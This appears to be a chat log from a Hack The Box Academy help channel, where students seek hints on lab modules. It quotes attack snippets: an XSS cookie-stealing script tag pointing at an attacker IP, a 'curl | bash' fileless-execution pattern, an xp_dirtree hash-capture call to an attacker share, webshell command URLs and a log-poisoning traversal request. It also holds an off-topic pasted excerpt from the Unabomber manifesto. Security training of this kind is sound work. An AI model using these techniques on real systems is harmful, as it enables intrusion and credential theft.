Yeah I'm going back to my box
how do i make a space in a url webshell
Hello, I have a question about something in the Introduction to Active Directory module,
in the AD Administration: Guided Lab Part I section, and in the Task 3: Manage Group Policy Objects.
We are asked to duplicate a GPO, modify some user and computer settings, and then link it to an OU which only contains user objects.
I know this task might have for goal only to practice and navigate in the GPOs settings, but isn't it strange to modify and enable computer settings even though there are no computer objects in the OU? Since because of that the computer settings won't be applied.
Wouldn't it confuse people? Or am I completely mistaken about how GPOs work?
Thanks for the answer.
Did u finish it
Need help on attacking lsass under password attacks, im unable to transfer the file to my attack machine
there is no vhosts, its a wordlist htb used as an example, use ||/usr/share/seclists/Discovery/DNS/namelist.txt||
Ye got it thanks
Hi
I need help on the module Stack-Based Buffer Overflows on Windows x86 -> skill assessment part.
i found the offset 4**, check for bad char (found 3 chars), and get a jmp esp addr in funcs.dll (0x62******).
But its not working, the program crashes but nothing happens... i am completely stuck and can't find what i am missing.
Please help 🙂 thanks
*offset : 4xx
Hey all. I have a scope question:
Going through the Server-Side attacks module. NOT LOOKING FOR SPOILERS. I'm on the final assessment and for the target, they give you a url in the format of <IP>:<PORT> to attack. Is it safe to assume that the scope of this engagement is limited to that port for initial recon or would we be allowed to run an NMAP scan on all the ports for that IP?
UPDATE 50 minutes later:
Figured it out. I was totally overthinking it. This was an easy one if you just walk the app manually looking at everything in Burp and go from there.
Read file transfer module on how to transfer files
Hello, for the module Cross-Site Scripting (XSS) - Session Hijacking: The module itself sets a php listener on 0.0.0.0:80, which is already in use for my pwnbox. Let's say I wanted to change the listener to 8080 for instance, which is free, how would the XSS command change?|| <script src="http://myIP:PORT/username"></script>|| for instance? Can someone give me a hint?
💀
Yeah?
Just say it here
i found support.it and support.us users
i couldn't find any admin users
and I don't know if admin user exists..
what to do next
i have passwords for support.it and support.us
i narrowed it down from rockyou using grep and regex
You did try brute forcing for a admin username right
So you tried them all and got nothing?
with .cn .gr. .it .us .uk
i tried to brute force them with wordslist
i narrowed it down from rockyou using grep and regex
but i can only find passwords for 2 users
support.it and support.us
i narrowed down passwords words list to 40 lines
and sprayed those passwords with valid users
only got 2 users with valid credentials
im doing something wrong here but i don't know what
Did you try other methods of gaining access to the server
I'm going crazy could I get some advice on Module Footprinting section FTP what should I try when I receive "try being more creative"
Like ssrf or whatever
I'm using some serious scans here and still getting nothing
i got the cookies and decoded them
Like what
came down to md5 hashes
What did you get?
support.it:support
i changed support to admin and used that cookie but it says user cant have requested role
OSCP automated scan gives
- All cve vulns
- UDP & TCP
- Services and version
- Directories
- Service users and suggested logins
still cant enumerate the FTP banner
I got the flag for the FTP user already
🤡
That should be more than enough
Did you find any cves
Btw
Yeah
But the question is " Submit the entire banner as the answer."
I dont have the whole banner
I might move on this seems like a waste o time
At this point I have no idea how to help you
you solved the skill assessment right
point me in the right direction
i dont mind spoilers
I didn’t
I’m just helping you based on my knowledge
oh okay
Am I supposed to find CVEs as a part of the banner?
Probably
theres a cve scripts on nse
But since you want to move on I won’t pressure you
I just like to finish the modules as I go instead of going back to them
Ok then
I prefer to anyways
@primal silo
I remember there was a method to help bypass that in burpsuite
But I can’t remember what rn
Hey Guys, will I still have access to the modules I have completed after I cancel my membership?
Module Footprinting Section SMB: Hey is CIFS only for Samba or can it be used on all SMB servers?
I dont think so
just take very good notes with obsidian
Hi, I need a hint on how to phrase the answer in Command Injection " Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?". I tried all injection operators url encoded and not encode and found a few working ones. If I just put them without any separator in the answer, it doesn't work
can 1 dm sm1 i need help with broken authentication module
I've been hard stuck on module Active Directory Enumeration & Attacks, AD Enumeration & Attacks - Skills Assessment Part I, Question 6 Submit this user's cleartext password for hours.
||I also posted about this problem yesterday and was hinted to use Mimikatz.exe. Problem is I still can't find the password. The forums also point in the direction of using Mimikatz.exe. I even opened my first ever ticket with HTB because I believed there was a bug in the lab, but they confirmed there is no bug and I need to do something else.
Please help, at this point I just want to know how to find it so I can find out what I keep doing wrong.||
Is there a specific place that shares/files go once you "get" them from an SMB share?
it was a directory my bad
I'm stuck on the linux privilege escalation module- credential hunting. I've obtained root user, yet I still can't find the wp-config.php file. I've used the command find, but it says no file or directory found. Can I have a pointer in the right direction on how I can find wp-config.php?
have you tried ||| find / | grep wp-config.php||
that worked! Thank you so much!
Hi
I need help on the module Stack-Based Buffer Overflows on Windows x86 -> skill assessment part.
i found the offset 4XX, check for bad char (found 3 chars), and get a jmp esp addr in funcs.dll (0x62XXXXXX).
But its not working, the program crashes but nothing happens... i am completely stuck and can't find what i am missing.
Please help 🙂 thanks
i didn't use Mimikatz for this but a just give it a try with Mimikatz and with the right tag i can only dump the password not the username but try crackmapexec
Np!
I'm running into an issue on the last question in the Pass the Hash (PtH) section of Password Attacks. I've followed the hints provided in the forum for this section and I still can't seem to get the reverse shell to work. I've got my listener running and I'm using the correct IP address of 172.16.1.10 in the revshells.com site to build the reverse shell. I get the response of command executed with process ID 3084 on DC01 but nothing appears in my listener. Any ideas what I'm doing wrong here?
I ran into the same issue. Mimikatz did not show the password. After resetting and starting again, the password was shown when running the same Mimikatz commands.
I figured out my mistake with some help. The revshell should have the IP as your listener. Also, make sure to copy and paste the result from the revshell site instead of copying and pasting the example in the lesson. It turns out that they're different.
Can any one help me with pivoting module assessment im stuck at loggin into dc
I'm on the next session now. Pass the Ticket (PtT) for Windows and I'm not able to remote into the target using the provided credentials? Has anyone else seen that before?
I tried xfreerdp, evil-winrm and impacket. Nothing works to gain access to the target with the credentials provided.
Hey team @carmine kiln @winged hedge - Currently doing the 'getting started' module of pentesting, on the 'Public Exploits' session. And the exercise I have to do with the target machine says "(server may take a few seconds to start)". But I have started two of them so far and still cant get it
The first step of the exercise is that I have to identify the services running on the server (and on their ports) - but I can't even get a ping response from the IP, nor my nmaps are working against it because the server "seems down". I don't know if I am doing something wrong or if it has to do completely with the disclaimer shown before.
(I tagged the mods cause I thought that's the way to go, but if anybody else reading this has some input I would appreciate it)
are you sure your vpn connection is ok ?
I believe so, have my VPN on and have been able to do other things - Also tried to use their own VMs and still doesn't work
restart the target machine and try again
wait 3 minutes after it starts before interacting with it
how go it get the"Academy User" role here 😄 ?
how do i get *
Looks like you found it? 🙂
I had some help figuring out my issue with RDP'ing into the windows box in the pass the ticket for windows section. When you use xfreerdp, don't put in /p: and the password. Let it ask for the password and you'll be able to then get in.
I really think that should probably be mentioned.
i need help with linux privilege escalation skills assessment. It says for flag1 i must enumerate all the files of the user, but i went through every folder of htb-student and can't find flag1. Any tips?
Hidden directories/files too?
yes, i did ls -la
I haven't done that one, I suppose it might be worth trying a 'find' with the username htb-student. Assuming htb-student owns the file with the flag.
Thanks! It was meant to be completed other way rather than scanning. 💀
I'm struggling with finding every single one of these flags except flag 2
FYI:
https://academy.hackthebox.com/module/77/section/727 has a bad "UnderTheWire" link (no biggie, but easy fix)
hi. I finished web requests module. in the command line everything was smooth, but in the browser, after authenticating with the proper cookie by replacing in a storage section of devtools, and getting to a search page (in POST section), after search attempt I had completely different results, and no okeyed POST with search.php showed up at all, but many others. my page reloaded instead of showing a result. what happened? the app works properly cause I could do all requests I wanted through cli.
hajao mizki
Hello guys
this may be a silly question but some of the modules in the Penetration Tester path have a publicIP:port and on those certain boxes I have a hard time using nmap or wget is there an option that I am missing?
if you check the help or man page they will show you options for ports if they are not the standard port. for nmap you can use -p to check all ports between 1 and 65535
thank you I will check that out
that PtT Linux question 8 was rough
anyone got issues with the module?
PIVOTING, TUNNELING, AND PORT FORWARDING - SOCKS5 Tunneling with Chisel
when i tried to run chisel on the ubuntu (pivot host) it gave me this error:
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel)
Download older version of chisel 🙂
Thanks! it works
Were you ever able to solve this? I'm stuck on it myself... Can't figure out the proper query. Feel free to DM
can someone give me a nudge on Footprinting lab medium, I am stuck at the beginning
anyone managed to install "SocksOverRDP-Plugin.dll" in RDP and SOCKS Tunneling with SocksOverRDP module?
the dll keeps disappearing after i extracted it out
Turn off the defender with the PowerShell command and it will work
MODULE: ACTIVE DIRECTORY ENUMERATION & ATTACKS
In Attacking Domain Trusts - Child -> Parent Trusts - from Windows - Q3:
Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.
I am able to see the content of the C drive, but cannot move forward to see other folders and files in it.. any help?
When I try to get sub-directory - it says cannot find path.. dir \\academy-ea-dc01.inlanefreight.local\Users
Thanks! disabled the R-T-M
Hey I need help for Attacking Common Services > Attacking Email Services I have found m**** user but couldn't find the password I'm thinking of hydra cannot be used as they said in the module. Need help its been too long I'm stuck in this
Why can Hydra not be used? Use Hydra.
In nmap "module/19/section/103" there is a question asking for a flag by checking on services, i got the flag (robots.txt) but it says wrong answer?
I tried reset the machine also, but the flag doesn't accepting
Can anyone help me with this.
I figured out thanks!
Linux privilege escalation -> Shared libraries
I don't understand why this isnt working. Doing just like the academy says and yet I get errors?
Welcome to the htb academy😂
I did manage to solve it by just ignoring the errors apparently they were fine as they were, just annoying that they didnt show up in the academy output so would have known they were supposed to be there lol
Hey 👋 guys I am just getting started into this HTB course. Can anyone help me with this error
ssh: connect to host [ip] port 22 : connection refused
Why is it giving me wrong? It's in Intro to Network Traffic Analysis
try 443 56282
without the .
also not working
refresh the page
hi I'm in Attacking DNS section from ATTACKING COMMON SERVICES module, I'm bruteforcing utilizing this command gobuster dns --domain "inlanefreight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt and only found
```
Found: ns.inlanefreight.htb
Found: helpdesk.inlanefreight.htb
Found: control.inlanefreight.htb
```
but any of them contain the flag what wordlist should I try next?
What module? If you have to SSH, is SSH open? Is it open on port 22?
attacking common services, attacking sql database
i could connect to the database and see the flagDB database, but have no access.
can anybody give me a push in the right direction for the two questions there?
What is the password for the "mssqlsvc" user?
Enumerate the "flagDB" database and submit a flag as your answer.
dm me
So, I'm doing Interactive Section with Target. I spawned my machine, and tried to access firefox so I can view http://157.245.40.149:30655. I can't. I get a timed out error. seems like my machine doesn't have access to the internet , in fact I can't even access the bookmarked tabs.
Is there a reason for that?
curl http://157.245.40.149:30655/ gives me a time out as well
does anybody know a way to automatically check Payloads for LFI. I'm in module File Inclusion, Automated Scanning section, I tried with burp suite, and tools I could find on the web but none of them works.
Also wrong
i think you have to add the IP to etc/hosts file
on their interactive machine ?
im not sure but i i think that for some machine ip's to have access you need to add the ip to the etc/hosts file on your machine
then your answer is wrong
I'm using a spawned machine. it seems like Firefox itself can't access the internet due to the firewall
maybe try to restart it if you can i haven't used it till now
Restarting doesn't work sadly , I tried it. maybe I need to connect it to openvpn
but again, how do I get the .opn file in this target machine

i think its enough to have the vpn open and working on your machine
which I do
try to restart the vpn maybe
maybe this challenge is bugged ?
I tried that
It is mentioned in the section that "hydra are usually blocked"
free users on academy don't have internet in their workstations
the target can be reached over the internet, if it doesn't work in the workstation for whatever reason, feel free to open it in your browser
I tried to open http://157.245.40.149:30665/ on my browser, however I get the same response, "connection timed out. If I get a subscription will this be resolved
So, this is a subscription issue, makes sense.
I did that section a while ago, but I believe it does recommend other tools for spraying O365, Google, and/or Okta environments
reset the target
I did
i dont know which question you are trying to solve, but on this module try also the dev.inlanefreight.htb domain and the fierce... wordlist
What are you talking about friends?
there was a confusion with other module from my part
Bro I'm not getting with o365 or CredKing
Which problem you have?
I am not able to find password for the user m**** from the Attacking Common Service > Attacking Email
attacking common services easy i know u can ||upload webshell with mysql & ftp|| but it doesnt seem like it does that at all.
use username with the domain
eg. hydra -l user@htb.com ....
at least as i remember
I tried like that in hydra and in o365 both but got the same results
i did that just now. both with rockyou.txt & password list provided in resources. they work. maybe a typo?
there are 3 mail protocols u tried BF all of them
No worries got it finalyyyyy
ezz

Which modules on HTB Academy do you think it helped for OSWE prep? I'm currently doing CBBH path in order to prepare for OSWE exam and also bought the Blind SQLi module, but I would like some advices on which modules from the tiers III and IV would help me most.
Guys need some help 👀 🚨 🔥
So I have connected to the RDP and I have found the users then I have found the important.txt file but when I try to connect to the SQL is giving me error. I have tried the whole string and also have tried the string without the "sa:" but still no access.... I have tried all accounts with that password and plus "admin:admin" and so on.... I have tried with the sa account as well.
have you tried connecting at the MSSQL DB from kali/parrot using some tool like sqsh or impacket-mssql ?
Transfer chisel to the target and make a reverse socks5 proxy, so you'll be able to interact with the target from your attack OS (kali/parrot), then use some tool to interact with the DB like I said before.
And ensure you have the correct credentials
Have you been able to figure it out yet? I have been stuck at the privesc piece for a while now. Haven't found anything that I don't already have for the initial user login.
The privesc one in the getting started module?
The Password Attacks module, Lab Easy. Question is asking for us to provide the root password. I scanned the host, found my way in. I went through all the items in Linux Credential Hunting. Looked for weak configurations "/etc/shadow", but haven't been able to find anything.
Nvm:
I reset the machine, ran an enum script I made a while back and found it. hahaha
nope -- doesn't work for me 😄 🤯
the Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries
Hey guys. I have a question regarding filetransfer module -
I have created a script (bash - through time) -asking 3 questions. Normally Manual done with wget FILE - chmod - execute. using read to collect the manual input.
Then Trying to do it with curl FILE | bash - like fileless attacks - It does not ask the 3 questions (can see the txt output is asking) - but the script just continues - and fails because of the missing user input.
Is it because of the read command in bash is not working
EDIT --> solution is read -p ANSWER < /dev/tty
May I get some help with Pivoting, Tunneling, and Port Forwarding - Skills Assessment Question 3?
I attempted to utilize ssh to dynamic port forward with the found id_rsa file as found user on the webshell but receiving the following error. As the ssh_config file is owned by root I am unable to edit the file to try to make it work.
Am I on the wrong path?
Guys, any tip on Password Attacks -> Credential Hunting in Linux? I logged in as Kira, but can not find Will pass. I cracked the archive but there is only the HTB flag, not the pass. For FireFox I need the master key and in Kira home directory there is only ssh keys for same user.
If you're still stuck try using ||metasploit (meterpreter section in the module)||
@austere osprey dm me I just did that one
Yes i solved it, still need help? Send me a DM
Got that to work and get me the answer. Thanks @opaque niche !
hi anyone can help me with ZAP Fuzzer section from USING WEB PROXIES stuck in this question The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists. Tried generating md5 cookies utilizing the provided wordlist then used burp intruder and repeater as I dont know how to use properly ZAP proxy, but got nothing, what should I try next?
Hey, a newbie here and im struggling with finding my VM IP in XSS module for /phishing section. Im not using a vpn so it means when i use ip a command i should copy the ip under eth0 and not tun0. But when i paste it into the required place within the code it doesnt happen what its supposed to happen. Pls help
should be like 10.10.15.42 or similar
I dont know but I think under tun0
The support told me under eth0 if im not using vpn
And im not
But i tried both and it didnt work
do you have ens224 or something like that?
Do you have any interfaces with an ip like the one I listed
Uhh i dont really know whats that bc my VM got terminated now i wasted so much time waiting for the support and they didnt answer me in time so
Ill see tomorrow
your vpn IP is assigned to the tun0 interface
if anyone has time, I need a nudge on a question from the 'pass the ticket from linux' module
dm
But why doesnt it work when i put it into the required field
i don't know what you have configured and what you are trying to do
I am trying to inject a login form
But i need the ip of vm
And it isnt working
Can you check it up pls if you have XSS module
this is a broad question if you want to ask your question, ask it, but it doesn't seem relevant to any academy modules so best to ask in #1024429874246590575 or asking in the relevant channel once you verify your htb account in #bot-commands
I'm having an issue using the ccache files to gain access to DC01 in the pass the ticket for linux section of the Password Attacks module. I've tried using both files for Julio and I keep getting no credentials cache found. I'm not seeing what I'm missing here.
Oh sorry, I can't find the channel for the questions
then you need to verify your http://app.hackthebox.com account in #bot-commands by typing in ++verify there; you will be DMed instructions on how to verify from there
literally just started, but anyone know the point of beautiful soup if you can just curl?
is it because it's python?
there's probably more options and stuff that make beautiful soup useful or more intuitive than curl
¯_(ツ)_/¯
hey
Beautiful Soup parses the response into an object that is easy to pull data from. It’s handy when writing a Python script that needs to use data scraped from a site.
Still having an issue gaining access to DC01 in the pass the ticket for linux section. I tried using both ccache files for Julio. One keeps changing and the other is static. Neither work. I get No credentials cache found after exporting it to root and running klist. Any ideas what I'm doing wrong? I've tried restarting the instance as well and get the same error each time.
I've tried with my own VM and using the pwnbox. I keep having the same issue. Neither ccache file works. Could there be something wrong with this module?
I just finished this module...you need assistance
this is great 🙂
Yes, I'm not sure what I'm doing wrong. I'm just starting up the instance again to clear everything.
dm me when you get to the point you're having trouble with
Okay, will do. Thank you!
anyone have a hint for the Passwd, Shadow, Opasswd section where we have to find the root password? I tried running hashcat on the unshadowed file with a bunch of different wordlists and haven't gotten a hit
if i don't achieve a passing score or complete the exam how many days do i have to schedule a retake. when i went to register for exam only thing i could find about an exam retake is this:
If Participant completes the exam and uploads the answer but does not achieve a passing score for Certification, Participant shall have the option of retaking the exam one more time with the original voucher within 20 days from the date he is notified by HackTheBox of the result.
If a Participant does not achieve a passing score the second time, the Participant must acquire a new Exam Voucher.
It makes it sound like retakes are only available if you complete the exam (solve everything) but still don't pass.
nvm, figured it out
Hey, I was wondering if someone could give me a small pointer on Skill Assessment - Broken Authentication. Id greatly appreciate it 🙂
where are you at?
@shrewd cradle Could I DM and Ill send a print screen at my current step if thats okay?
sure
Thanks
May I get some help with Pivoting, Tunneling, and Port Forwarding - Skills Assessment Question 4?
I received a meterpreter session, ran autoroute, attempted proxychains xfreerdp with the found credentials in the webshell pointing to the found IP address for question 3 but getting a failed to connect error
hi people im trying to import an exploit module on metasploit but i cant get it. has someone had problems with module imports?
you can just put it in /usr/share/metasploit-framework/modules/folder and just call it from there?
hey all im trying to use scanner/http/joomla_bruteforce_login in msf for a subdomain: test123.inlanefreight.local however when i use it it only shows this as the site its attacking: http://10.129.230.222:80/administrator/index.php - Failed to find Joomla Login Response as an error. how can i get it to go against the subdomain? i've tried changing rhosts and vhosts to the subdomain but it still only goes against the ip
iirc the metasploit module didn't work for me, so I used https://github.com/ajnik/joomla-bruteforce
I tried that however it stops after trying first password and makes it look like it worked but it didn't. any thought?
Do you have the subdomain pointed to the ip address in /etc/hosts ?
yep
Then use intruder 😉
mercy meee lol ok i'll try
but intruder is slow as shit wish i had practiced more with zap
I'm trying out the ffuf module and am having an issue. Using the built-in pwnbox, I am doing the first interactive section. I can see ffuf working and running through the wordlist, but no matches are displayed at the end of the fuzzing.
What submask are you occupying with autoroute?
17.16.5.0
And what command are you executing in the meterpreter with the autoroute?
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
Run
no lol, meterpreter > run autoroute -s|| try with ip/23 or/24 or /16|| or make sure the socks proxy is working
Sorry for the late reply
run autoroute -s 172.16.5.0/23
I have a question about running MSF's socks proxy..how do you background it? Seems when I "ctrl+z" it just kills the socks proxy
hey im stuck at the 3rd qus of this section
attacking enterprise networks module.
https://academy.hackthebox.com/module/163/section/1549
i tried to do all of the things but theres a problem that occurs and fails the task to run so i checked the log and am putting the log output here can anyone help me out?
in meterpreter, type "background",
to get back into it, in msfconsole commands, sessions -i <number of the session>
Any clue why it may be stopping automatically after it starts?
mm maybe you have to edit /etc/proxychains or perform the metasploit commands again or last option restart the machine
This is what comes to my mind right now
Restarted HTB machine, looks as I have proxychains configured correctly..and still the SOCKS proxy server is stopping right away. I will try and reset my VM. Thanks for your help either way @opaque niche !
no problem ^^
...
I am on the skill assessment for the pivoting, tunneling module, and im getting some odd results when running nmap through proxychains, or when running a for loop to do a ping sweep from the pivot host.
Proxychains: proxychains nmap -v -sn 172.16.5.1-200 wont find the host I know is there, and outputs "Host is up" on all entries
and
running "for i in {1..200}; do (ping -c 1 172.16.5.$i); done" on the pivot host, also fails to find the live host.
but if I manually ping just the one IP I already know is there, I get a response. Anyone that could help me understand why this could be happening?
When you run nmap -sn you are doing a ping sweep on the network range. Proxychains supports tunnelling TCP (and UDP in SOCKS5 I believe). A ping sweep uses ICMP, which is on another network layer and cannot be tunnelled through proxychains. The false positives right now are a result of the command pinging your own machine a bunch of times and not being tunnelled.
To solve this issue you would want to start your ping sweep on whatever the machine is that has access to the internal network
The module has an example for doing ping sweeps using meterpreter I believe
I see, thanks @rich light ill do some looking around to get a better grasp on it
Confused on https://academy.hackthebox.com/module/19/section/103. Where is the flag supposed to be? Am I supposed to log in to one of the services or is it supposed to be in the banner?
Tried various types of scans, and intercepting using netcat/tcpdump. Still don't see any flag?
Hi there! Is someone here doing the HTTP Misconfiguration module? I’m stuck in the web cache poisoning/host header combined attack.
The lab is not working at all
I already added the needed vhosts and gave some minutes to the lab to start, refreshed the target several times too, yet it’s not working
Make sure to use the --packet-trace flag described in the module
I am unable to RDP to the machine in the 'Introduction to Active Directory' module
Im trying to paste the xfreerdp log into the chat, but the bot keeps deleting it
try restarting the machine
Hey, Im working Firewall and IDS/IPS Evasion - Medium Lab . I got the port 53 version NLnet Labs NSD . need some help. Anyone?
Bro can you help me in Skill Assessment Easy section? I have got into database and uploaded the shell and I am able to load the file but cannot get the shell
Anyone?
can i learn how to hack
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@wet narwhal ^
yea
I didn't use a reverse shell. I would also suggest before immediately jumping to a shell test to see if your exploit actually works (id, whoami, etc).
you don't need to mess with DNS for the medium lab
Actually the question is to find the DNS server version
my b I was looking at footprinting not nmap... you can dm me and I'll be able to help you further
sure
Using Web Proxies - Skills Assessment - Q3
I have the 31 character thing I'm supposed to have that appears to be an md5 according to the question. How am I supposed to fuzz with intruder. I'm having a hard time understanding how I would set this up to attempt this question and would love a little help. It says clearly what to do but I'm not quite understanding how I would go about this and would love a little help if possible.
Is this saying that I should basically fuzz a-z 0-9 until I can put this into some md5 converter?
Step 1. fuzz for the last character until it returns correct?
Step 2. encode md5 with previous methods used to decode.
you could create a bash script that'll do that for you and take the md5sum after each attempt and search through those results to find the correct flag
I cant code (i'm sure i could just chat gpt it).
I believe there is a way to do it in Burp
it's been a while since I've done that module and my notes are at home soooo
Mind if I pm?
Yea I'm finishing the last couple of questions and having a much harder time than I should so its worrying me lol
I don't know how much help I'll be😅 I did the Burp module back when I wasn't taking good notes. I know how to use the tool and whatnot but I still have to go back through that module and update my notes
Haha thats fair thats exactly what i'm doing now
Finishing up the last couple ones that havent been answered / done. My notes are horrible and I hate it
I was pretty good except for the ffuf and burp module. I'm already confident in the tools, but I'm going to redo them once I finish the CPTS path to actually get notes for my cheatsheet/playbook
really sucks
css module at phishing part
what to do actually
not make sense
at phishing part
any help please?
Hi, I'm having trouble listing the total packages installed in Linux. I've tried dpkg -list| wc -l
and apt list --installed | wc -l
both give different answers and both wrong
Hey all. Could do with a nudge if possible: On Skills assessment part 1 - Windows Priv esc task ** Escalate privileges and submit the contents of the flag.txt file on the Administrator Desktop.** - ive got juicypotato and nc.exe on the windows box - but cannot seem to get NT Authority shell - im using the default BITs as CLSID and using cmd.exe as the program launch.
has anyone got any other ideas I could try?
Hey wheelz, you are best off adding, the module / question and task on the Q too. - easier to get the help
Cheers Doozy, It's Linux fundamentals - File Descriptors and Redirections
You are using the pwnbox yes? As this module they are expecting you to use it
I was ssh into it but can use it
how do i compromise ||john|| hard lab common services ? i tried ||rdp mssql ||
maybe you should try MSSQL again
@fathom pendant using pwnbox yields the same results. I'm clearly using the wrong commands but can't for the life of me work out what the correct one is. I've tried dpkg --list and apt list --installed. one gives 738 and the other gives 748. This is for the Linux fundamentals - File Descriptors and Redirections. Has anyone got any other pointers I could try?
can anyone do a sanity check on "Attacking common Services" - "Attacking SMB"? Im struggling to find jasons password.
are you using the password list that was provided in the resources?
The password list from the ftp .
the password can be found in the password list from the resources
on the easy lab attack common services how do i put a whole command in the ||webshell url||
depends on the web shell you are using, if its a simple php request cmd or whatever, you can issue commands simply by http://example.com/shell.php?cmd=<command>
most browsers can do url encoding automatically
bc if i type c=cd C:/ for example it doesnt go through completely
it just says illegal url
url encode it then
I need some help with Service Enumeration:
The challenge is asking me to: "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer."
I am assuming it's a banner. I have pulled all of the banners of the target and don't find anything
||and 31337 is empty||
try to use another method to grab the banner
tried using nmap and nc, just havent tried tcpdump. Let me give that a shot
encoding doesn't work too
||nevermind, got it working. Just needed a longer timeout I think||
hi, im stuck with the hard lab of footprint module https://academy.hackthebox.com/module/112/section/1080
i get the credentials for user tom from snmp but when i try to ssh I get the error of Permission denied (publickey), any help ?
Maybe you should try the credentials somewhere else 😉
thank you! 🙂
can someone help me with answering this question : What is the admin email address? in the imap/pop3 module please? I can't figure out the command to view email addresses
Web Attacks - Skills Assessment---I've logged into the Admin account and I'm full stuck on what I'm supposed to do here. Googling around seems to point to the events XML thing and I cannot post to it.
Im currently doing the attacking joomla in attacking common applications module and i have the flag but it wont let me submit ive tried to reset box but it didnt work
explore the application, capture every action/request you do on the app with burp
once you see something, poke it
@autumn pilot from asking around I know that this is the point where i'm supposed to have access to the /createevent thing
but I do not have access?
all I can say is to explore, if you think the target could be borked reset it
Think it has to be at this point i've looked at everything else I think
ill give it a go thanks
Hi, I just did the Attacking Common Services Medium Lab. It took me less than 2 minutes to find the flag. Can you tell me if, according to the assignment, I should be messing around with dns/mail service, and the fact that the flag is available after a 10-second bruteforce is a simple mistake, but did someone not think the assignment through very well?
Hi, im currently working on the web enumeration module. I apologize if this question sounds dumb but, when I try to use gobuster I keep getting this error https://prnt.sc/EgfXYstFCZSL Is this part of the module or a general error? Thanks in advance.
Which task exactly? I'll look in the notes right away and try to help something.
Hi! Im currently working on the Password Attacks Lab - Medium Assessment, I was able to get into a share, obtain a file to be cracked and extracted a Document. This was encrypted too so I found the password and tried to decrypt it and it turns out that the file has been corrupted
I later checked the actual zip file too and it was corrupted as well
Any idea how I would fix this or get around this?
Theres only one question in the portion that im on. Which just says "use what youve learned about web enumeration to find the flag"
Ughh, could you provide me a link to this module?
are you sure you can connect to the website and that it isn't running on a different port?
I'm not really a gobuster user, but the error says can't connect to site
I tried manually connecting to the website myself and also was continued to be timed out.
well that's your problem then. If you can't reach the site neither can gobuster
if you're sure that's the right IP try resetting the lab
I understand that, what im asking is it something that I need to try to work around because its part of the training or is it an actual problem. I already have reset the IP
I would say it's a problem with your connection/lab instance
Ill reset my client and see if that helps. Thanks for the quick help
After resetting my instance, I appear to be having the same problem.
Read the full reason why it gave you the error, is the key set to correct permissions?
Did you change VPN region, or change from tcp to UDP for VPN or vice versa?
Also: if it's a spawned ip then you'll need to include the port it gives you
if i get a student subscription on htb academy will i have access to penetration tester job path?
yes, but you dont get an exam voucher with it
yeah thats what i needed thank you
does it count for high schoolers too?
like the student sub
Im not sure, they have an internal list of schools where an email is automatically valid from, but you can try with a school email that isnt accepted and then contact support to verify it and theyve been known to add exceptions.
I haven't heard much about highschool school emails though.
Im actually not sure what I did but, after restarting my computer, it is now fixed.
yeah, but my hs email blocks third party so i cant like register or log in with it
You can try hashing it out with support but I think chances sound slim
looks like its all good, texted the support and provided some info :D thanks
has anyone gotten this while using hydra even for a simple dictionary attack? [ERROR] waittime must be larger than 0
nvm i see where i went wrong
just a fat finger
attacking common services, sql attack, i try to steal the hash, i logged in to the database, i see there flagdb, then i execute EXEC master..xp_dirtree '\IP\flagDB', but i can't see anything at my responder...any hint?
You ran the connect to your share after starting responder?
its \\attacker_ip\attacker_share_name
not the db name
just like this EXEC master..xp_dirtree '\IP\share'?
tried both 😂
Anyone able to perform CVE-2014-3704 manually via "Attacking Drupal" Section in module "Attacking Common Applications"? Can't seem to get the SQLi syntax right.
assuming you set up your fake share that way
that or my notes are wrong
yeah...thank u. impacket did work...responder not...
nope, shoulda saved em 😦
Skills Assessment File Include
I was able to confirm that User-Agent would show up in logs.....I'm no longer able to?
||```
GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log HTTP/1.1
Host: 144.126.200.173:32767
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Plzfuckingwork
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
```||
This is the last response I'm getting and it will not update for any newer time / request sent
||144.126.200.173 - - [13/Mar/2023:22:18:40 +0000] "GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log HTTP/1.1" 200 1283 "-" "||

